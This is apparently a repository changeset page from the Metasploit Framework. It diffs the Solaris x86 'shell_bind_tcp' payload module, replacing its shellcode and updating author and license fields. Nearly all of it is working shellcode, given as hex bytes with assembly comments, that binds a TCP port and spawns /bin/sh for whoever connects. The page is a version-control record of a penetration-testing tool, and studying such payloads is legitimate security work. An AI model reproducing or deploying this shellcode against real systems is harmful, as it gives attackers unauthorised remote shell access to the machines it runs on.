Navigation

← Previous Changeset
Next Changeset →

Changeset 4842

Timestamp:

05/02/07 22:12:33 (1 year ago)

Author:

hdm

Message:

More payloads from Ramon (fixes #98, #99, #100, #101)

Files:

framework3/tags/framework-3.0/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb (modified) (3 diffs)

Legend:

: Unmodified
: Added
: Removed
: Modified
: Copied
: Moved

framework3/tags/framework-3.0/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb

r4571	r4842
1		##
2	1	# $Id$
3		##
4
5		##
6		~~# This file is part of the Metasploit Framework and may be subject to~~
7		~~# redistribution and commercial restrictions. Please see the Metasploit~~
8		~~# Framework web site for more information on licensing and terms of use.~~
9		~~# http://metasploit.com/projects/Framework/~~
10		##
11
12	2
13	3	require 'msf/core'
…	…
30	20	'Version' => '$Revision$',
31	21	'Description' => 'Listen for a connection and spawn a command shell',
32		'Author' => '~~bighawk <bighawk@warfare.com~~>',
33		'License' => ~~BSD~~_LICENSE,
	22	'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
	23	'License' => MSF_LICENSE,
34	24	'Platform' => 'solaris',
35	25	'Arch' => ARCH_X86,
…	…
40	30	'Offsets' =>
41	31	{
42		'LPORT' => [ 33, 'n' ],
	32	'LPORT' => [ 20, 'n' ],
43	33	},
44	34	'Payload' =>
45		"\xb8\xff\xf8\xff\x3c\xf7\xd0\x50\x31\xc0\xb0\x9a\x50\x89\xe5\x31" +
46		"\xc9\x51\x41\x41\x51\x51\xb0\xe6\xff\xd5\x31\xd2\x89\xc7\x52\x66" +
47		"\x68\x27\x10\x66\x51\x89\xe6\x6a\x10\x56\x57\xb0\xe8\xff\xd5\xb0" +
48		"\xe9\xff\xd5\x50\x50\x57\xb0\xea\xff\xd5\x31\xd2\xb2\x09\x51\x52" +
49		"\x50\xb0\x3e\xff\xd5\x49\x79\xf2\x50\x68\x2f\x2f\x73\x68\x68\x2f" +
50		"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\xff\xd5"
	35	"\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff #
	36	"\x6a\x65" +# pushl $0x65 #
	37	"\x89\xe6" +# movl %esp,%esi #
	38	"\xf7\x56\x04" +# notl 0x04(%esi) #
	39	"\xf6\x16" +# notb (%esi) #
	40	"\x31\xc0" +# xorl %eax,%eax #
	41	"\x50" +# pushl %eax #
	42	"\x68\xff\x02\x04\xd2" +# pushl $0xd20402ff #
	43	"\x89\xe7" +# movl %esp,%edi #
	44	"\x6a\x02" +# pushl $0x02 #
	45	"\x50" +# pushl %eax #
	46	"\x50" +# pushl %eax #
	47	"\x6a\x02" +# pushl $0x02 #
	48	"\x6a\x02" +# pushl $0x02 #
	49	"\xb0\xe6" +# movb $0xe6,%al #
	50	"\xff\xd6" +# call *%esi #
	51	"\x6a\x10" +# pushl $0x10 #
	52	"\x57" +# pushl %edi #
	53	"\x50" +# pushl %eax #
	54	"\x31\xc0" +# xorl %eax,%eax #
	55	"\xb0\xe8" +# movb $0xe8,%al #
	56	"\xff\xd6" +# call *%esi #
	57	"\x5b" +# popl %ebx #
	58	"\x50" +# pushl %eax #
	59	"\x50" +# pushl %eax #
	60	"\x53" +# pushl %ebx #
	61	"\xb0\xe9" +# movb $0xe9,%al #
	62	"\xff\xd6" +# call *%esi #
	63	"\xb0\xea" +# movb $0xea,%al #
	64	"\xff\xd6" +# call *%esi #
	65	"\x6a\x09" +# pushl $0x09 #
	66	"\x50" +# pushl %eax #
	67	"\x6a\x3e" +# pushl $0x3e #
	68	"\x58" +# popl %eax #
	69	"\xff\xd6" +# call *%esi #
	70	"\xff\x4f\xd8" +# decl -0x28(%edi) #
	71	"\x79\xf6" +# jns <bndsockcode+61> #
	72	"\x50" +# pushl %eax #
	73	"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
	74	"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
	75	"\x89\xe3" +# movl %esp,%ebx #
	76	"\x50" +# pushl %eax #
	77	"\x53" +# pushl %ebx #
	78	"\x89\xe1" +# movl %esp,%ecx #
	79	"\x50" +# pushl %eax #
	80	"\x51" +# pushl %ecx #
	81	"\x53" +# pushl %ebx #
	82	"\xb0\x3b" +# movb $0x3b,%al #
	83	"\xff\xd6" # call *%esi #
51	84	}))
52	85	end

Navigation

Changeset 4842

Legend:

framework3/tags/framework-3.0/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb

Download in other formats: